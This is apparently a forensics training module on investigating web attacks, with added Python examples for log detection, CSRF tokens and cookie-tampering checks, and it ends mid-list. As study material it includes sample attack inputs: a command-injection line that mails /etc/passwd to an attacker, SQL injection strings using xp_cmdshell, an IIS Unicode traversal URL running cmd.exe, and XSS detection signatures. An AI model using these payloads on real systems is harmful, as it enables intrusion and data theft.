Module XXX – Investigating Web Attacks

Page 1: File000143

Page 2: File000143

EC-Council Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited

News: Web Application Hacks - Upping The Arms Race

Source: http://www.informationweek.com/

Page 3: File000143


News: Mystery Web Attack Hijacks Your Clipboard

Source: http://www.theregister.co.uk/

Page 4: File000143


News: Georgian Web Attacks are the Work of Kids

Source: http://www.theinquirer.net/

Page 5: File000143


Scenario

Three Russian citizens were charged with extorting money from U.K. e-commerce companies on October 4, 2006. Ivan Maksakov, Alexander Petrov, and Denis Stepanov were accused of receiving $4 million from UK firms. The trio concentrated on U.K. Internet gambling sites, collecting information about British web casinos and bookmakers' offices using spy software designed by one of the members, and then demanded ransoms from the owners of those websites by threatening them with Denial-of-Service attacks.

In six months of activity, the accused attacked over 54 web servers in 30 different countries. The U.K. National Hi-Tech Crime Unit (NHTCU) and the Russian authorities investigated this case and arrested them.

Page 6: File000143


Case Study: Word Flaw Hit With Zero-Day Attack

Page 7: File000143


Module Objective

This module will familiarize you with:

• Indications of a Web Attack
• Types of Web Attacks
• Overview of Web Logs
• Investigation of Web Attacks
• Investigation of FTP Servers
• Investigation of IIS Logs
• Investigation of Web Attacks in Windows-based Servers
• Web Page Defacement
• Investigation of DNS Poisoning
• Investigation of Static and Dynamic IP Addresses
• Checklist for Security to Web Attacks
• Tools for Web Attack Investigations

Page 8: File000143


Module Flow

Indications of a Web Attack

Types of Web Attacks

Overview of Web Logs

Investigation of Web Attacks

Investigation of FTP Servers

Investigation of IIS Logs

Investigation of Web Attacks in Windows-based Servers

Web page Defacement

Investigation of DNS Poisoning

Investigation of Static and Dynamic IP Address

Checklist for Security to Web Attacks

Tools for Web Attack Investigations

Page 9: File000143


Indications of a Web Attack

Customers reporting to an organization that they are not able to access its online service

A legitimate web page being redirected to an unknown website

Frequent rebooting of the server

Anomalies found in the log files

Page 10: File000143


Types of Web Attacks

Cross-Site Scripting (XSS) Attack

Cross-Site Request Forgery (CSRF)

SQL Injection

Code Injection

Command Injection

Parameter Tampering

Cookie Poisoning

Buffer Overflow

Cookie Snooping

Page 11: File000143


Types of Web Attacks (cont’d)

DMZ Protocol Attack

Zero Day Attack

Authentication Hijacking

Log Tampering

Web Services Attack

Directory Traversal

Cryptographic Interception

URL Interpretation

Impersonation Attack

Page 12: File000143


Cross-Site Scripting (XSS)

Cross Site Scripting (XSS or CSS) is an application layer hacking technique

It occurs when a dynamic web page collects malicious data from a user and displays the input on the page without it being properly validated

Cross Site Scripting allows an attacker to embed malicious JavaScript, VBScript, ActiveX, HTML, or Flash into a vulnerable dynamic page and trick the user into executing the script on his machine in order to gather data

The use of XSS might compromise private information, manipulate or steal cookies, create requests that can be mistaken for those of a valid user, or execute malicious code on the end-user systems

Page 13: File000143


Investigating Cross-Site Scripting (XSS)

The regular expression below checks for attacks that may contain HTML opening and closing tags (<>) with any text inside, and their hex equivalents

Regular expression for simple CSS attack:

• /((\%3C)|<)((\%2F)|\/)*[a-z0-9\%]+((\%3E)|>)/ix
• ((\%3C)|<) - check for opening angle bracket or hex equivalent
• ((\%2F)|\/)* - the forward slash for a closing tag or its hex equivalent
• [a-z0-9\%]+ - check for alphanumeric string inside the tag, or hex representation of these
• ((\%3E)|>) - check for closing angle bracket or hex equivalent

Snort signature:

• alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"NII Cross-site scripting attempt"; flow:to_server,established; pcre:"/((\%3C)|<)((\%2F)|\/)*[a-z0-9\%]+((\%3E)|>)/i"; classtype:web-application-attack; sid:9000; rev:5;)

Page 14: File000143


Investigating Cross-Site Scripting (XSS) (cont’d)

Regular expression for "<img src" CSS attack:

• /((\%3C)|<)((\%69)|i|(\%49))((\%6D)|m|(\%4D))((\%67)|g|(\%47))[^\n]+((\%3E)|>)/i
• ((\%3C)|<) – checks opening angled bracket or hex equivalent
• ((\%69)|i|(\%49))((\%6D)|m|(\%4D))((\%67)|g|(\%47)) - checks the letters 'img' in varying combinations of ASCII, or upper or lower case hex equivalents
• [^\n]+ - checks any character other than a new line following the <img
• ((\%3E)|>) - closing angled bracket or hex equivalent

Paranoid regex for CSS attacks:

• /((\%3C)|<)[^\n]+((\%3E)|>)/i
• It simply looks for the opening HTML tag, or its hex equivalent, followed by one or more characters other than the newline, and then followed by the closing tag or its hex equivalent
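The signatures above are written for Snort's PCRE engine. What follows is an added Python example, not from the EC-Council slides, that applies all three patterns to request URIs taken from a constructed web log, decoding percent-encoding up to twice so that double-encoded payloads such as %253C (which decodes to %3C and then to <) are not missed by the raw-text patterns. The log lines, client addresses and payloads are constructed for the example.

```python
import re
from urllib.parse import unquote

# The three slide signatures, translated from Perl/PCRE notation: the trailing
# /i flag becomes re.IGNORECASE (the /x flag is unnecessary, the patterns have
# no whitespace).
SIGNATURES = {
    "simple_tag": re.compile(r"((\%3C)|<)((\%2F)|\/)*[a-z0-9\%]+((\%3E)|>)", re.IGNORECASE),
    "img_tag": re.compile(
        r"((\%3C)|<)((\%69)|i|(\%49))((\%6D)|m|(\%4D))((\%67)|g|(\%47))[^\n]+((\%3E)|>)",
        re.IGNORECASE,
    ),
    "paranoid": re.compile(r"((\%3C)|<)[^\n]+((\%3E)|>)", re.IGNORECASE),
}

# Constructed sample log (not a real capture): date time client-ip method uri status
SAMPLE_LOG = """\
2004-12-11 07:10:02 192.2.3.4 GET /search.asp?q=apache+logs 200
2004-12-11 07:10:15 192.2.3.4 GET /search.asp?q=%3Cscript%3Ealert(1)%3C/script%3E 200
2004-12-11 07:10:31 192.2.3.4 GET /guestbook.asp?msg=%3Cimg%20src=evil.gif%3E 200
2004-12-11 07:10:44 192.2.3.4 GET /search.asp?q=%253Cb%253Ebold%253C/b%253E 200
2004-12-11 07:11:02 10.1.1.7 GET /index.html 200
"""


def scan_request(uri, max_decode_rounds=2):
    """Return the sorted names of the signatures matching the raw URI or any
    of its percent-decoded forms. Decoding repeatedly (up to the given number
    of rounds) catches double-encoded payloads that the raw patterns miss."""
    candidates = [uri]
    current = uri
    for _ in range(max_decode_rounds):
        decoded = unquote(current)
        if decoded == current:  # nothing left to decode
            break
        candidates.append(decoded)
        current = decoded
    hits = set()
    for text in candidates:
        for name, pattern in SIGNATURES.items():
            if pattern.search(text):
                hits.add(name)
    return sorted(hits)


def scan_log(log_text):
    """Parse the constructed log layout (date time client-ip method uri status)
    and return (client_ip, uri, matching_signatures) for each flagged line."""
    findings = []
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) < 5:
            continue
        client_ip, uri = parts[2], parts[4]
        hits = scan_request(uri)
        if hits:
            findings.append((client_ip, uri, hits))
    return findings


if __name__ == "__main__":
    for client_ip, uri, hits in scan_log(SAMPLE_LOG):
        print(client_ip, uri, hits)
```

The guest-book line is caught only by the "img" and paranoid patterns, because the space after "img" breaks the alphanumeric run the simple pattern expects; the double-encoded line is caught only after the second decoding round, which is the reason to normalise before matching rather than relying on the %3C alternatives alone.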

Page 15: File000143


Cross-Site Request Forgery (CSRF)

Attacker forces the victim to submit his form data to the victim’s web server

Attacker takes an arbitrary action as soon as the victim takes preventive measures against the web site

It targets the images that are generally found on Internet forums

It can:

• Exploit a site's trust in a user
• Involve sites that rely on the user's identity
• Trick a user into sending HTTP requests to a site
• Involve HTTP requests that have side effects

Page 16: File000143


Anatomy of CSRF Attack

• Step 1: Attacker hosts a web page with pre-populated HTML form data

• Step 2: Victim browses the attacker's HTML form

• Step 3: The web page automatically submits that pre-populated form data to a site where the victim has access

• Step 4: The site authenticates the request (attacker's form data) as coming from the victim

• Result: Attacker's form data is accepted by the server since it was sent from a legitimate user

Page 17: File000143


Pen-Testing CSRF Validation Fields

Test 1

• Verify that the validation field is unique for each user

Test 2

• Verify that the validation field cannot be determined by other users
• If an attacker can create the same validation field for another user, there is no value in the validation field
• Validation field must be unique for each site

Test 3

• Verify that the validation field is never sent on the query string
• This data could be leaked in places like the HTTP referrer to an attacker

Test 4

• Verify that the request fails when the validation field is missing
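The four tests describe properties of the CSRF validation field (anti-CSRF token). As an added illustration, not part of the slides, here is a Python implementation of such a field that satisfies them, together with a routine that applies the four tests to it. The session identifiers, site names and URLs are constructed; SERVER_SECRET is a hypothetical server-side key, and deriving the token with an HMAC over the session and site is one design choice among several (a random per-session value stored server-side works as well).

```python
import hashlib
import hmac
import secrets
from urllib.parse import parse_qs, urlsplit

# Hypothetical server-side secret. A real deployment generates it once and
# keeps it out of source control; it is created here so the example runs offline.
SERVER_SECRET = secrets.token_bytes(32)


def issue_token(session_id, site="www.example.com"):
    """Derive the validation field from the user's session and the site.
    An HMAC over (site, session) makes the token unique per user (Test 1),
    unique per site (Test 2) and not computable without SERVER_SECRET."""
    msg = f"{site}|{session_id}".encode()
    return hmac.new(SERVER_SECRET, msg, hashlib.sha256).hexdigest()


def validate_request(session_id, form_fields, site="www.example.com"):
    """Server-side check on a state-changing request: it fails unless the POST
    body carries a token matching the one derived for this session (Test 4)."""
    token = form_fields.get("csrf_token")
    if token is None:
        return False
    return hmac.compare_digest(token, issue_token(session_id, site))


def token_in_query_string(url):
    """Test 3: flag URLs that carry the validation field in the query string,
    where it could leak through the Referer header or proxy logs."""
    return "csrf_token" in parse_qs(urlsplit(url).query)


def run_pentest_checks():
    """Apply the four slide tests to this implementation; every value is True
    when the implementation passes."""
    alice = issue_token("sess-alice")
    bob = issue_token("sess-bob")
    return {
        "test1_unique_per_user": alice != bob,
        "test2_unique_per_site": issue_token("sess-alice", "shop.example.net") != alice,
        "test3_not_in_query_string": not token_in_query_string(
            "https://www.example.com/transfer?amount=100"
        ),
        "test4_missing_token_rejected": not validate_request("sess-alice", {"amount": "100"}),
        "valid_token_accepted": validate_request(
            "sess-alice", {"amount": "100", "csrf_token": alice}
        ),
    }


if __name__ == "__main__":
    for name, passed in run_pentest_checks().items():
        print(f"{name}: {'PASS' if passed else 'FAIL'}")
```

The comparison uses hmac.compare_digest rather than == so that a timing difference cannot reveal how many leading characters of a guessed token are correct.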

Page 18: File000143


SQL Injection Attacks

SQL injection is a type of security exploit in which the attacker adds SQL code to a web form input box to gain access to the database resources

For example, in a search page, the developer may execute a query (VBScript/ASP) using the code:

• Set myRecordset = myConnection.execute("SELECT * FROM myTable WHERE someText ='" & request.form("inputdata") & "'")

If input such as blah' or 1=1 -- is entered in the search page, the ASP builds and executes the statement:

• SELECT * FROM myTable WHERE someText ='blah' or 1=1 --'

• The WHERE clause above is always true (the trailing quote is commented out by --), so the statement returns the whole recordset

Page 19: File000143


Investigating SQL Injection Attacks

Look for SQL injection attack incidents in these locations:

• IDS log files
• Database server log files
• Web server log files

The attack signature may look like:

• 12:34:35 192.2.3.4 HEAD GET /login.asp?username=blah' or 1=1 --
• 12:34:35 192.2.3.4 HEAD GET /login.asp?username=blah' or )1=1 (--
• 12:34:35 192.2.3.4 HEAD GET /login.asp?username=blah' or exec master..xp_cmdshell 'net user test testpass --
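As an added example, not from the slides, the following Python code reproduces the vulnerable query from the previous slide against a constructed in-memory SQLite table, shows the parameterised form that keeps the same input inert, and checks log lines shaped like the entries above against a simple injection signature. The table contents, the log lines and the SQLI_SIGNATURE pattern are assumptions made for this example.

```python
import re
import sqlite3
from urllib.parse import unquote


def build_demo_db():
    """Constructed in-memory table standing in for the slide's myTable."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE myTable (id INTEGER PRIMARY KEY, someText TEXT)")
    conn.executemany(
        "INSERT INTO myTable (someText) VALUES (?)",
        [("apache logs",), ("ftp logs",), ("secret record",)],
    )
    return conn


def search_concatenated(conn, inputdata):
    """Mirrors the slide's ASP: user input is glued into the SQL text, so a
    quote in the input changes the structure of the statement."""
    sql = "SELECT * FROM myTable WHERE someText ='" + inputdata + "'"
    return conn.execute(sql).fetchall()


def search_parameterized(conn, inputdata):
    """Hardened form: the input is bound as a parameter and is only ever
    compared as a value, whatever characters it contains."""
    return conn.execute(
        "SELECT * FROM myTable WHERE someText = ?", (inputdata,)
    ).fetchall()


# Assumed detection signature (not from the slides): a quote followed by an
# OR/UNION/EXEC keyword, a comment marker or a statement separator.
SQLI_SIGNATURE = re.compile(r"(?:%27|')\s*(?:or\b|union\b|exec\b|--|;)", re.IGNORECASE)

# Constructed log lines in the slide's layout: time client-ip HEAD GET uri.
# The third line is a legitimate value containing an apostrophe.
SAMPLE_LOG = """\
12:34:35 192.2.3.4 HEAD GET /login.asp?username=blah' or 1=1 --
12:34:36 192.2.3.4 HEAD GET /login.asp?username=blah%27%20or%201%3D1%20--
12:35:01 10.1.1.7 HEAD GET /login.asp?username=o'brien
12:35:09 10.1.1.7 HEAD GET /search.asp?q=apache+logs
"""


def find_sqli_in_log(log_text):
    """Return (client_ip, decoded_uri) for log lines matching the signature.
    The URI is percent-decoded first so encoded variants are not missed."""
    findings = []
    for line in log_text.splitlines():
        parts = line.split(maxsplit=4)
        if len(parts) < 5:
            continue
        client_ip, uri = parts[1], unquote(parts[4])
        if SQLI_SIGNATURE.search(uri):
            findings.append((client_ip, uri))
    return findings


if __name__ == "__main__":
    db = build_demo_db()
    payload = "blah' or 1=1 --"
    print("concatenated:", search_concatenated(db, payload))   # every row
    print("parameterized:", search_parameterized(db, payload))  # no rows
    print("log findings:", find_sqli_in_log(SAMPLE_LOG))
```

The concatenated version returns all three rows for the slide's input, while the parameterised version returns none; the log check matches both the plain and the percent-encoded form of the entry but not the apostrophe in o'brien, which is the kind of false positive a signature based on the quote character alone would raise.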

Page 20: File000143


News: SQL Injection Attacks Against Databases Rise Sharply

Source: http://computerworld.com/

Info-theft attempts up nearly 40-fold since beginning of year

Page 21: File000143


Code Injection Attack

A code injection attack is similar to SQL injection, but instead of SQL commands, attackers pass other types of malicious code, such as PHP scripts and shell commands, to the web form input box of an application

The purpose of the injected code is to bypass or modify the intended functionality of the program

In this attack, arbitrary code is executed on the target server

• Example: A web server has a "Guest book" script which receives small messages like "It is a nice site!"

• An attacker may instead insert the message "; cat /etc/passwd | mail [email protected] #", which reads the password file on the web server and e-mails it to the attacker
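Added example (Python, not part of the slides): what the guest-book script above does with the injected message when it splices it into a shell command line, how a tokeniser that follows shell rules can be used to flag such input before it is stored or forwarded, and the hardened form that hands the message to the child process as data rather than as part of a command. The mail client is replaced by a Python one-liner that echoes standard input, and the addresses are placeholders, so the example runs offline.

```python
import shlex
import subprocess
import sys

# Constructed guest-book messages: the benign one from the slide and the
# injected one. The mailbox is a placeholder, not a real address.
BENIGN = "It is a nice site!"
INJECTED = "; cat /etc/passwd | mail attacker@example.invalid #"


def build_unsafe_command(message, recipient="owner@example.invalid"):
    """The vulnerable pattern: the message is pasted into a shell command
    line. Returned as a string for inspection only; nothing here runs it."""
    return f"echo {message} | mail -s guestbook {recipient}"


def commands_in_line(command_line):
    """Tokenise the line the way a POSIX shell would and list the command
    names it would run: the first word of each segment separated by ; | & && ||."""
    lex = shlex.shlex(command_line, posix=True, punctuation_chars=True)
    lex.whitespace_split = True
    commands, expect_command = [], True
    for tok in lex:
        if tok in (";", "|", "&", "&&", "||"):
            expect_command = True
        elif expect_command:
            commands.append(tok)
            expect_command = False
    return commands


def looks_like_command_injection(message):
    """Input-side check a guest book can apply: a message that would add
    commands under a shell (or leaves a quote open, which also breaks the
    intended command) is rejected."""
    try:
        return len(commands_in_line(f"echo {message}")) > 1
    except ValueError:  # unbalanced quotes
        return True


def deliver_without_shell(message):
    """Hardened form: no shell is involved, the message travels as data on
    stdin. A Python one-liner echoing stdin stands in for the mail client."""
    proc = subprocess.run(
        [sys.executable, "-c", "import sys; sys.stdout.write(sys.stdin.read())"],
        input=message, capture_output=True, text=True, check=True,
    )
    return proc.stdout


if __name__ == "__main__":
    for msg in (BENIGN, INJECTED):
        print(repr(msg))
        print("  commands a shell would run:", commands_in_line(build_unsafe_command(msg)))
        print("  flagged:", looks_like_command_injection(msg))
        print("  delivered verbatim:", deliver_without_shell(msg) == msg)
```

For the benign message the assembled line runs exactly the two intended programs; for the injected one the tokeniser shows a third command appearing between them, and the original mail command disappears behind the trailing "#". With the argument-list form the same text is delivered unchanged, because there is no shell to interpret it.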

Page 22: File000143


Investigating Code Injection Attack

An executable-instruction detector in an Intrusion Detection System (IDS), together with a series of sandbox execution environments provided by the operating systems on the network, is used to detect code injection attacks

The IDS identifies series of executable instructions and sends the suspicious packet's payload to the execution environment matching the packet's destination

The proper execution environment is determined by examining the destination IP address of the incoming packet

The payload is executed in the corresponding monitored environment, and a report containing the payload's OS resource usage is returned to the IDS

If the report contains evidence of resource usage, the IDS generates an alert; otherwise the packet is considered non-malicious

Page 23: File000143


Parameter Tampering

Parameter tampering is a form of web attack in which certain parameters in the URL entered by a user are changed during the exchange between the client and the web server without the user's authorization

By modifying the arguments (parameters) in the query, the attacker can navigate through the web and database servers and retrieve or modify their contents

Page 24: File000143


Cookie Poisoning

Cookie poisoning attacks involve the modification of the contents of a cookie in order to steal personal information of a user

Cookies stored on the computer's hard drive maintain bits of information that allow web sites to authenticate the users’ identity, speed up transactions, monitor behavior, and personalize web services

Stolen personal information is generally used for other malicious attacks such as identity theft and online frauds

Page 25: File000143


Investigating Cookie Poisoning Attack

Trace the Set-Cookie commands issued by the web server, and store information such as cookie name, cookie value, IP address, and the session to which that cookie was assigned

Intercept each HTTP request sent to the web server, retrieve the cookie information from it, and check it against all stored cookies

A change in the contents of a cookie indicates that an attack has occurred

[Figure: attacker sends an invalid cookie to the server]
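The three steps above describe a ledger of issued cookies compared against incoming requests. The following Python code is an added illustration, not from the slides, of that check, plus the usual mitigation of signing cookie values with an HMAC so tampering is detectable without keeping a ledger. Session identifiers, client addresses and cookie values are constructed; SERVER_KEY is a hypothetical server-side secret.

```python
import hashlib
import hmac
import secrets
from http.cookies import SimpleCookie

# Hypothetical server-side key; generated here so the example runs offline.
SERVER_KEY = secrets.token_bytes(32)


class CookieLedger:
    """Investigation method from the slide: record every cookie the server
    sets (name, value, client IP, session) and compare the cookies presented
    on later requests against that record."""

    def __init__(self):
        self.issued = {}  # (session_id, cookie_name) -> (value, client_ip)

    def record_set_cookie(self, session_id, client_ip, set_cookie_header):
        """Parse a Set-Cookie header and remember what was issued to whom."""
        cookie = SimpleCookie()
        cookie.load(set_cookie_header)
        for name, morsel in cookie.items():
            self.issued[(session_id, name)] = (morsel.value, client_ip)

    def check_request(self, session_id, client_ip, cookie_header):
        """Parse a request's Cookie header and return (name, reason) findings
        for every cookie that does not match what the server issued."""
        findings = []
        cookie = SimpleCookie()
        cookie.load(cookie_header)
        for name, morsel in cookie.items():
            issued = self.issued.get((session_id, name))
            if issued is None:
                findings.append((name, "cookie never issued for this session"))
                continue
            value, ip = issued
            if morsel.value != value:
                findings.append((name, "value differs from the one the server set"))
            if ip != client_ip:
                findings.append((name, "presented from a different client IP"))
        return findings


def sign_cookie_value(value):
    """Mitigation: append an HMAC so the server can verify the value it reads
    back is the one it wrote, without a ledger of every cookie ever issued."""
    mac = hmac.new(SERVER_KEY, value.encode(), hashlib.sha256).hexdigest()
    return f"{value}.{mac}"


def verify_signed_cookie(signed):
    """Return the original value if the MAC checks out, otherwise None."""
    value, sep, mac = signed.rpartition(".")
    if not sep:
        return None
    expected = hmac.new(SERVER_KEY, value.encode(), hashlib.sha256).hexdigest()
    return value if hmac.compare_digest(mac, expected) else None


if __name__ == "__main__":
    ledger = CookieLedger()
    ledger.record_set_cookie("sess-1", "192.2.3.4", "role=user; Path=/")
    ledger.record_set_cookie("sess-1", "192.2.3.4", "cart=3")
    print(ledger.check_request("sess-1", "192.2.3.4", "role=user; cart=3"))   # []
    print(ledger.check_request("sess-1", "192.2.3.4", "role=admin; cart=3"))  # role tampered
    print(ledger.check_request("sess-1", "10.0.0.3", "role=user"))            # different client
    signed = sign_cookie_value("user")
    print(verify_signed_cookie(signed), verify_signed_cookie("admin." + signed.split(".")[1]))
```

The ledger approach is what an investigator reconstructs after the fact from captured traffic; the signed value is what an application should have been using in the first place, since a modified role in a signed cookie fails verification regardless of who presents it.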

Page 26: File000143


Buffer Overflow/Cookie Snooping

Buffer Overflow:

• A buffer overflow is the result of writing more data into a buffer than the buffer can hold

• In such attacks, the extra data may contain code designed to trigger specific actions, sending new instructions to the attacked computer that damage the user's files, change data, or disclose confidential information

• Attackers attempt to overflow vulnerable backend servers with excess requests, and can often execute commands directly on the compromised server

Cookie snooping:

• The attacker decodes the user's credentials, logs on as an authorized user, and gains access to sensitive information

Page 27: File000143


Detecting Buffer Overflow

Nebula (NEtwork-based BUffer overfLow Attack detection) technique detects buffer overflow attacks based solely on the traffic observed without requiring any modifications to the end hosts

Nebula uses a generalized signature that can capture all known variants of buffer overflow attacks while reducing the number of false positives to a negligible level

Page 28: File000143


DMZ Protocol Attack/ Zero Day Attack

DMZ Protocol Attack:

• Most web applications include protocols such as DNS and FTP; these protocols have many inherent vulnerabilities and are exploited to gain access to other critical applications

Zero Day Attack:

• It refers to exploits that take advantage of a newly discovered vulnerability in a program or operating system before the software developer finds a solution for that vulnerability

Page 29: File000143


Authentication Hijacking

Authentication prompts a user to supply the credentials that allow access to the application

Enforcing a consistent authentication policy between multiple and disparate applications can prove to be a real challenge

An authentication hijacking can lead to theft of service, session hijacking, and user impersonation

Page 30: File000143


Investigating Authentication Hijacking

Check whether the browser remembers the password (a common mistake users make when selecting the 'remember password' option)

Check whether the user failed to log off from the application

Page 31: File000143


Log Tampering

Logs are kept to track the usage patterns of the application

Log tampering allows attackers to cover their tracks or alter web transaction records

Attackers try to delete logs, modify logs, change user information, or otherwise destroy evidence of any attack

Page 32: File000143


Directory Traversal

Directory traversal occurs when the attacker is able to browse directories and files outside the normal application access

The attack exposes the directory structure of the application, and often the underlying web server and the operating system

The attacker can enumerate contents, access secure or restricted pages, gain confidential information, and locate the source code

Page 33: File000143


Cryptographic Interception

Using cryptography, confidential messages can be securely exchanged between two parties

Encrypted traffic flowing through network firewalls and IDS systems is not inspected

An attacker takes advantage of a secure channel to carry out an exploit more efficiently than over an open channel

Page 34: File000143


URL Interpretation and Impersonation Attack

URL Interpretation:

• A web server failing to parse a URL correctly is termed URL interpretation
• Example: Unicode or superfluous decode attacks

Impersonation Attack:

• An impersonation attack is an attack in which an attacker spoofs web applications by pretending to be a legitimate user

Page 35: File000143


Overview of Web Logs

Log files come in handy for detecting web attacks

The source, nature, and time of the attack can be determined by analyzing the log files of the compromised system

Log files record HTTP status codes that are specific to the type of incident

Web servers that run IIS or Apache are prone to log file deletion by attackers who have access to the web server, since the log files are stored on the web server itself

Page 36: File000143


Investigating Web Attacks

1. Analyze web server, FTP, and local system logs to confirm a web attack

2. Check log file information with respect to time/time stamps, IP address, HTTP status code, and requested resource

3. Identify the nature of the attack. Is it a DDoS attack, or an attack targeted just at you? Is someone trying to shut down your network altogether, or attempting to infiltrate individual machines?

4. Localize the source

5. Use your firewall and IDS logs to know where the attack is coming from (or came from!)

6. This will help you identify whether the attack/penetration is coming from a compromised host on your network or from the outside world

Page 37: File000143


Investigating Web Attacks (cont’d)

7. Block the attack

8. Once you know where the attack is coming from, you can take action to stop it

9. If you have identified specific machines that have been compromised, pull them from the network until you can disinfect them and return them to service

10. If an attack or attempted attack is coming from outside, block access to the network from that IP address

11. START YOUR INVESTIGATION – from the IP address!

Page 38: File000143


Example of FTP Compromise

Attacker runs port scanning:

# nmap -O 23.3.4.5 -p 21
Starting nmap
Interesting ports
Port State Service
21/tcp open ftp
80/tcp open www
Remote OS is Windows 2000

The attacker connects using ftp:

ftp 23.3.4.5
Connected to 23.3.4.5
Username: administrator
Password:

Page 39: File000143


Investigating FTP Logs

The FTP logs on a Windows 2000 server are stored in the directory:

• C:\WINDOWS\system32\LogFiles\MSFTPSVC1

[Screenshot of an FTP log]

Page 40: File000143


Investigating FTP Servers

FTP server vulnerabilities allow an attacker to directly compromise the system hosting the FTP server

Direct compromise of an FTP server can be as simple as obtaining legitimate passwords by:

• Social engineering
• Brute-force guessing
• Network sniffing

Network and FTP logs provide records that can serve as valuable evidence

Page 41: File000143


Investigating IIS Logs

IIS logs all visits in log files. The log file is located at <%systemroot%>\logfiles

If proxies are not used, the client IP address can be logged

This request (exploiting the IIS Unicode vulnerability) lists the log files:

• http://victim.com/scripts/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+C:\Winnt\system32\Logfiles\W3SVC1

Page 42: File000143


Investigating Apache Logs

The Apache server has two logs, namely:

Error log:

• The Apache server saves diagnostic information and error messages that it encounters while processing requests
• The default path of this file is /usr/local/apache/logs/error_log in Linux
• It is an important piece of evidence from the investigator's point of view
• Example: [Sat Dec 11 7:12:36 2004] [error] [client 202.116.1.3] Client sent malformed Host header

Access log:

• It contains requests processed by the Apache server
• By default, access logs are stored in the common log format
• The default path of this file is /usr/local/apache/logs/access_log in Linux
• Example: 202.116.1.3 - shilp [11/Dec/2004:6:23:13 -0500] "GET /apache_ft.gif HTTP/1.0" 200 1577
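Added Python example, not from the slides, covering the log checks from the "Investigating Web Attacks" steps (time stamps, IP address, status code, requested resource) over Apache common log format and error log lines: it parses both formats, summarises requests per client and per status code, and flags directory traversal in request paths, including the overlong UTF-8 form (%c0%af) shown on the IIS slide, which a strict decoder rejects and a signature looking only for "../" would miss. The first access-log line and the error-log line are the slide's own examples; the remaining lines are constructed.

```python
import re
from collections import Counter
from urllib.parse import unquote_to_bytes

# Apache common log format: host ident user [time] "method path proto" status bytes
CLF = re.compile(
    r'^(?P<host>\S+) (?P<ident>\S+) (?P<user>\S+) \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)(?: (?P<proto>[^"]+))?" (?P<status>\d{3}) (?P<size>\d+|-)$'
)
# Apache error log line: [time] [level] [client ip] message
ERRLOG = re.compile(
    r'^\[(?P<time>[^\]]+)\] \[(?P<level>\w+)\] \[client (?P<client>[^\]]+)\] (?P<message>.*)$'
)
# ".." as a whole path segment, with either separator
TRAVERSAL = re.compile(r"(^|[/\\])\.\.([/\\]|$)")

# Constructed sample logs; line 1 of each is the slide's example.
SAMPLE_ACCESS_LOG = """\
202.116.1.3 - shilp [11/Dec/2004:6:23:13 -0500] "GET /apache_ft.gif HTTP/1.0" 200 1577
202.116.1.3 - - [11/Dec/2004:6:23:40 -0500] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 291
202.116.1.3 - - [11/Dec/2004:6:23:41 -0500] "GET /../../etc/passwd HTTP/1.0" 403 212
10.1.1.7 - - [11/Dec/2004:6:24:02 -0500] "GET /index.html HTTP/1.1" 200 4096
"""
SAMPLE_ERROR_LOG = """\
[Sat Dec 11 7:12:36 2004] [error] [client 202.116.1.3] Client sent malformed Host header
"""


def lenient_decode(path):
    """Percent-decode a request path and additionally map two-byte overlong
    UTF-8 sequences (e.g. %c0%af) to the ASCII character they encode, as the
    vulnerable IIS decoder on the slide did. Everything else is kept byte for byte."""
    raw = unquote_to_bytes(path)
    out = bytearray()
    i = 0
    while i < len(raw):
        b = raw[i]
        if b in (0xC0, 0xC1) and i + 1 < len(raw) and 0x80 <= raw[i + 1] <= 0xBF:
            out.append(((b & 0x1F) << 6) | (raw[i + 1] & 0x3F))
            i += 2
        else:
            out.append(b)
            i += 1
    return out.decode("latin-1")


def is_traversal(path):
    """True when the decoded path contains a '..' segment."""
    return TRAVERSAL.search(lenient_decode(path)) is not None


def parse_access_log(text):
    """Return one dict per well-formed common-log-format line."""
    entries = []
    for line in text.splitlines():
        m = CLF.match(line)
        if m:
            entry = m.groupdict()
            entry["status"] = int(entry["status"])
            entry["traversal"] = is_traversal(entry["path"])
            entries.append(entry)
    return entries


def summarize(entries):
    """The step-2 checks: requests per client IP, status code distribution,
    and the (host, time, path) of every traversal attempt."""
    return {
        "requests_per_ip": Counter(e["host"] for e in entries),
        "status_codes": Counter(e["status"] for e in entries),
        "traversal_attempts": [(e["host"], e["time"], e["path"]) for e in entries if e["traversal"]],
    }


def parse_error_log(text):
    """Return one dict per well-formed error-log line."""
    return [m.groupdict() for m in map(ERRLOG.match, text.splitlines()) if m]


if __name__ == "__main__":
    summary = summarize(parse_access_log(SAMPLE_ACCESS_LOG))
    print(summary["requests_per_ip"], summary["status_codes"])
    for host, when, path in summary["traversal_attempts"]:
        print("traversal:", host, when, path)
    for err in parse_error_log(SAMPLE_ERROR_LOG):
        print("error log:", err["client"], err["message"])
```

The overlong sequence is handled separately because Python's own UTF-8 decoder, like any correct one, refuses it; matching on the normalised path is what lets one signature cover both the plain and the encoded traversal.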

Page 43: File000143


Investigating Web Attacks in Windows-based Servers

Run Event Viewer to look at the logs:

• C:\> eventvwr.msc

Look for a large number of failed logon attempts or locked-out accounts

Check whether the following suspicious events have occurred:

• Event log service stops
• Windows File Protection is not active on the system
• The MS Telnet Service started successfully

Page 44: File000143


Investigating Web Attacks in Windows-Based Servers (cont’d)

Look at file shares and ensure that each of them has a defined business purpose:

• C:\> net view 127.0.0.1

Look at who has an open session with the system:

• C:\> net session

Look at which sessions the machine has opened with other systems:

• C:\> net use

Look at NetBIOS over TCP/IP activity:

• C:\> nbtstat -S

Look for unusual listening TCP and UDP ports:

• C:\> netstat -na

Page 45: File000143


Investigating Web Attacks in Windows-based Servers (cont’d)

Look for unusual scheduled tasks on the local host, such as tasks running as a user in the Administrators group or as SYSTEM:

• C:\> at

Look for new accounts in the Administrators group:

• C:\> lusrmgr.msc

Look for unexpected processes by running Task Manager

Look for unusual network services:

• C:\> net start

Check file space usage to look for a sudden decrease in free space:

• C:\> dir

Page 46: File000143


Web Page Defacement

Unauthorized modification of a web page leads to web page defacement

• The attacker convinces a legitimate user to perform an action (e.g., giving away credentials) that may help in the attack

Attacking techniques:

